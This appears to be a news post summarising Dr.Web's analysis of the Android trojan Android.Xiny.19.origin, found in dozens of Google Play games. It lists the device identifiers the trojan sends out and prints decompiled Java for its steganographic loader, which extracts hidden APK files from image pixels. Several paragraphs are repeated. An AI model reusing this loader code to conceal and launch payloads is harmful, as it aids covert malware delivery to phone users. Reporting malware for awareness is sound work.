Russian anti-virus company Dr Web published a blog post about Android.Xiny.19.origin, malware which has incorporated itself into more than 60 Android-based games developed by Conexagon Studio, Fun Color Games, BILLAPPS, and some 30 other companies.
This new Android trojan that has targeted dozens of games in the official Google Play Store relies on steganography to dynamically run arbitrary APK files.
If you have download and use Android gaming applications on your device from these developers, then this part might frighten you slightly.
The Trojan is designed to download, install, and run programs upon receiving a command from cybercriminals. Besides, it can display annoying advertisements.
The infection process begins as soon as the user begins playing the game, the Trojan is performing its malicious activity.
Android.Xiny.19.origin
Android.Xiny.19.origin sends the following information to the command and control server:
For Now, Dr.Web says that Google has been notified about the issue & failed to take down the apps it reported as infected with Android.Xiny.
So Users just be careful before downloading any apps from PlayStore unless you have a Anti-Virus Program installed on your device.
Source: Dr.Web
This new Android trojan that has targeted dozens of games in the official Google Play Store relies on steganography to dynamically run arbitrary APK files.
If you have download and use Android gaming applications on your device from these developers, then this part might frighten you slightly.
The Trojan is designed to download, install, and run programs upon receiving a command from cybercriminals. Besides, it can display annoying advertisements.
The infection process begins as soon as the user begins playing the game, the Trojan is performing its malicious activity.
Android.Xiny.19.origin
Android.Xiny.19.origin sends the following information to the command and control server:
- IMEI identifier
- IMSI identifier
- Information about the mobile operator
- Presence of a memory card in a device
- Country
- Language
- MAC address
- Version of the operating system
- Package name and a version of an application that the Trojan is incorporated into
- Presence of the malicious application in the system folder
- Displays annoying advertisements
- Downloads applications and prompts a user to install various software
- Installs and deletes programs if root access is available on a device
- Launches arbitrary apk files hidden in images received from the C&C server
Code Expand source
package com.wch.c_direct.encrypt.logic;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import com.wch.c_direct.logic.a;
import java.io.InputStream;
import java.util.Arrays;
public final class BitmapDecryptor {
public static byte[] decrypt(InputStream inputStream) {
int i5;
int i = 4;
int i1 = 8;
a.a();
Bitmap bitmap0 = BitmapFactory.decodeStream(inputStream);
bitmap0.setHasAlpha(true);
byte[] buffer1 = new byte[i1];
int i2 = 0;
int i3 = 0;
int i4 = 0;
while(i2 < buffer1.length) {
i5 = bitmap0.getPixel(i4, i3);
buffer1[i2] = ((byte)(i5 >> 16 & 15));
if(i2 + 1 < i1) {
buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15));
}
if(i2 + 2 < i1) {
buffer1[i2 + 2] = ((byte)(i5 & 15));
}
++i4;
if(i4 == bitmap0.getWidth()) {
++i3;
i4 = 0;
}
i2 += 3;
}
byte[] buffer2 = BitmapDecryptor.a(buffer1);
i2 = 0;
i3 = 0;
while(i2 < i) {
i3 = i3 << 8 | buffer2[i2] & 255;
++i2;
}
buffer1 = new byte[i3 * 8 / 4];
i2 = 0;
i3 = 0;
i4 = 0;
while(i2 < buffer1.length) {
i5 = bitmap0.getPixel(i4, i3);
buffer1[i2] = ((byte)(i5 >> 16 & 15));
if(i2 + 1 < buffer1.length) {
buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15));
}
if(i2 + 2 < buffer1.length) {
buffer1[i2 + 2] = ((byte)(i5 & 15));
}
++i4;
if(i4 == bitmap0.getWidth()) {
++i3;
i4 = 0;
}
i2 += 3;
}
byte[] decrypted = BitmapDecryptor.a(buffer1);
bitmap0.recycle();
return Arrays.copyOfRange(decrypted, i, decrypted.length);
}
private static byte[] a(byte[] inBuffer) {
a.a();
byte[] outBuffer = new byte[inBuffer.length / 2];
int i;
for(i = 0; i < outBuffer.length; ++i) {
int i1;
for(i1 = 0; i1 < 2; ++i1) {
outBuffer[i] = ((byte)(outBuffer[i] << 4 | inBuffer[i * 8 / 4 + i1]));
}
}
return outBuffer;
}
}
For Now, Dr.Web says that Google has been notified about the issue & failed to take down the apps it reported as infected with Android.Xiny.
So Users just be careful before downloading any apps from PlayStore unless you have a Anti-Virus Program installed on your device.
Source: Dr.Web
